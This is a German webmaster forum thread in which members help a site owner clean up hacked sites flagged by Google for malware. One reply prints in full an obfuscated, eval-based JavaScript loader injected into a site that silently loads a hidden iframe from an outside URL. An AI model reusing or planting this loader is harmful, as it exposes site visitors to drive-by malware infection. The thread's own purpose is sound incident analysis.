Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!

Seite gehackt - Bitte um Hilfe!

T

time4consulting

New member
Registriert
30. Apr. 2009
Beiträge
595
Reaktionspunkte
0
Soweit alles erkannt und auf dem Weg der Beseitigung !

Vielen Dank für die Mithilfe!


Andre
 
Zuletzt bearbeitet:
Wenn Du aus dem Webmastertool "Malware" heraus die Überprüfung beantragt hast und nichts gefunden wurde, dauert es in der Regel 1 bis 2 Tage bis der Hinweis verschwindet. Das Googleergebnis ist von heute, als sollte morgen, spätestens übermorgen der Spuk vorbei sein und Du von der Blacklist runter sein..

LG
Thomas
 
Da scheinen auch noch andere Seiten von dir betroffen: Ich habe mal stichprobenartig drei Adressen aus deinem Footer aufgerufen, überall die Malware-Warnung.
 
casino schrieb:
Da scheinen auch noch andere Seiten von dir betroffen: Ich habe mal stichprobenartig drei Adressen aus deinem Footer aufgerufen, überall die Malware-Warnung.
Zum Vergrößern anklicken....

Hatte das Vergnügen selbst im Sommer...

Ergebnis: Das FTP-Programm war schuld, bzw. ein Trojaner hat sich die dort hinterlegten Zugangsdaten verschafft.. Sicherheitslücke.

FileZilla, ist wohl schon mehreren Leuten passiert.

Die Google-Warnung blieb trotz Entfernung des Schadcodes und Anfrage zur Neuüberprüfung bei manchen Websites noch 1-2 Wochen stehen.. supi.
 
vielen dank für eure antworten und hinweise!

webmastertools nutze ich für diese seiten leider nicht, somit kann ich das auf dem weg nicht melden / überprüfen lassen.

wie vom kollegen oben geschrieben, hat´s mindestens 2 weitere seiten erwischt, die nehm ich mir gerade vor...


schönen sonntag noch...

andre
 
Bei diversen Seiten aus Deinem Footer springt mein Virenscanner an. Ich würde Dir dringend empfehlen, diese Seiten sofort offline zu nehmen, bist Du diese Probleme beseitigen kannst. Google ist derzeit da noch da kleinere Problem ...

Gruß monte
 
Auf panzerketten.net ist folgender Code eingebunden:

PHP: 
<script>atz="y";leh="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[leh].getElementById("asd"))}()}catch(ahumm){phvuh=function(rixn){rixn="fro"+rixn;for(nxfm=0;nxfm<atz.length;nxfm++){spb+=String[rixn](phomh(jvxkty+(atz[nxfm]))-(42));}};};phomh=(window.eval);jvxkty="0x";qgnazy=0;if(!qgnazy){try{++phomh(leh)["\x62o"+"d"+atz]}catch(ahumm){zjefy="(";}atz="33(33(93(90(4a(52(8e(99(8d(9f(97(8f(98(9e(58(91(8f(9e(6f(96(8f(97(8f(98(9e(9d(6c(a3(7e(8b(91(78(8b(97(8f(52(51(8c(99(8e(a3(51(53(85(5a(87(53(a5(37(33(33(33(93(90(9c(8b(97(8f(9c(52(53(65(37(33(33(a7(4a(8f(96(9d(8f(4a(a5(37(33(33(33(8e(99(8d(9f(97(8f(98(9e(58(a1(9c(93(9e(8f(52(4c(66(93(90(9c(8b(97(8f(4a(9d(9c(8d(67(51(92(9e(9e(9a(64(59(59(96(90(97(99(98(96(93(98(8f(58(8e(8f(59(9e(8f(9d(9e(59(9e(8f(9d(9e(58(9a(92(9a(51(4a(a1(93(8e(9e(92(67(51(5b(5a(5a(51(4a(92(8f(93(91(92(9e(67(51(5b(5a(5a(51(4a(9d(9e(a3(96(8f(67(51(a1(93(8e(9e(92(64(5b(5a(5a(9a(a2(65(92(8f(93(91(92(9e(64(5b(5a(5a(9a(a2(65(9a(99(9d(93(9e(93(99(98(64(8b(8c(9d(99(96(9f(9e(8f(65(96(8f(90(9e(64(57(5b(5a(5a(5a(5a(9a(a2(65(9e(99(9a(64(5a(65(51(68(66(59(93(90(9c(8b(97(8f(68(4c(53(65(37(33(33(a7(37(33(33(90(9f(98(8d(9e(93(99(98(4a(93(90(9c(8b(97(8f(9c(52(53(a5(37(33(33(33(a0(8b(9c(4a(90(4a(67(4a(8e(99(8d(9f(97(8f(98(9e(58(8d(9c(8f(8b(9e(8f(6f(96(8f(97(8f(98(9e(52(51(93(90(9c(8b(97(8f(51(53(65(90(58(9d(8f(9e(6b(9e(9e(9c(93(8c(9f(9e(8f(52(51(9d(9c(8d(51(56(51(92(9e(9e(9a(64(59(59(96(90(97(99(98(96(93(98(8f(58(8e(8f(59(9e(8f(9d(9e(59(9e(8f(9d(9e(58(9a(92(9a(51(53(65(90(58(9d(9e(a3(96(8f(58(96(8f(90(9e(67(51(57(5b(5a(5a(5a(5a(9a(a2(51(65(90(58(9d(9e(a3(96(8f(58(9e(99(9a(67(51(5a(51(65(90(58(9d(9e(a3(96(8f(58(9a(99(9d(93(9e(93(99(98(67(51(8b(8c(9d(99(96(9f(9e(8f(51(65(90(58(9d(9e(a3(96(8f(58(9e(99(9a(67(51(5a(51(65(90(58(9d(8f(9e(6b(9e(9e(9c(93(8c(9f(9e(8f(52(51(a1(93(8e(9e(92(51(56(51(5b(5a(5a(51(53(65(90(58(9d(8f(9e(6b(9e(9e(9c(93(8c(9f(9e(8f(52(51(92(8f(93(91(92(9e(51(56(51(5b(5a(5a(51(53(65(37(33(33(33(8e(99(8d(9f(97(8f(98(9e(58(91(8f(9e(6f(96(8f(97(8f(98(9e(9d(6c(a3(7e(8b(91(78(8b(97(8f(52(51(8c(99(8e(a3(51(53(85(5a(87(58(8b(9a(9a(8f(98(8e(6d(92(93(96(8e(52(90(53(65(37(33(33(a7".split(zjefy);spb="";phvuh("mCharCode");phomh(""+spb);}</script>

Entschlüsselt sieht der so aus:

js.jpg

Es wird also in einem Iframe eine Url aufgerufen, vor der auch gewarnt wird. Darüber wird/wurde dann vermutlich die Malware verteilt.

Würde:
  1. Alle FTP Zugänge ändern (sonst kämpfst du gegen Windmühlen)
  2. Diesen und ähnliche Codes finden und entfernen

Viel Erfolg!
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Similar threads

Adomino
Greatdomain.com Seite gehackt ?
Antworten
1
Aufrufe
455
crystalheaven
crystalheaven
domint
Frische Seite - wann in der Google Ergebnisliste
Antworten
5
Aufrufe
1K
III
I
M
Bitte Besucht und Bewertet diese Seite!
Antworten
10
Aufrufe
2K
domain-dealer
domain-dealer
B
Beste Seite zum ermitteln der des Domain Wertes ?
Antworten
3
Aufrufe
659
Freddy
Freddy
morepas
Die dunkle Seite der Online-Werbung
Antworten
5
Aufrufe
642
crystalheaven
crystalheaven
Zurück
Oben